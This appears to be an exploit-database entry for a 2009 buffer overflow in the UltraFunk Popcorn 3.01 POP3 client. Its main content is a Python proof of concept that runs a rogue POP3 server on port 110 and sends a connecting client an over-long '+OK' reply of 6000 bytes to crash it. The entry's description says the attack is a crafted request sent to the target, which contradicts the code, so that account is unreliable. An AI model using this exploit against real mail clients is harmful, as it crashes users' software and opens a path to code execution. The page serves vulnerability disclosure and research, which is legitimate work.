header-logo
Suggest Exploit
vendor:
Popcorn
by:
x.CJP.x
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Popcorn
Affected Version From: 3.01
Affected Version To: 3.01
Patch Exists: YES
Related CWE: N/A
CPE: //a:ultrafunk:popcorn:3.01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

UltraFunk Popcorn 3.01 Buffer Overflow

A buffer overflow vulnerability exists in UltraFunk Popcorn 3.01. A remote attacker can exploit this vulnerability to execute arbitrary code on the target system. The vulnerability is due to insufficient boundary checks when handling user-supplied input. An attacker can send a specially crafted POP3 request containing an overly long string to trigger the buffer overflow. This may allow the attacker to execute arbitrary code on the target system with the privileges of the vulnerable application.

Mitigation:

Upgrade to the latest version of UltraFunk Popcorn.
Source

Exploit-DB raw data:

#!/usr/bin/python
#[x]Product download : http://www.ultrafunk.com/products/popcorn/
#[+]Founder : x.CJP.x
#[+]Greeting : His0k4,Sub-Zero,Bibi-info,Aach2006,Youness,Simitch,Halimz,Bibicha.. :=)
#[-]Seni seviyorum, base64_decode('TW91bmE=');

from socket import *
import struct

buffer="\x41"*6000 # just random

s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 110))
s.listen(1)
print "[*] Listening on [POP3] 110"
c, addr = s.accept()
print "[*] Connection accepted from: %s" % (addr[0])

c.send("+OK "+buffer+"\r\n")
c.recv(512)
raw_input("[*] Crashed!\nPress key to quit")
c.close()
s.close()

# milw0rm.com [2009-04-23]

Navigation

Suggest Exploit

Services By CQR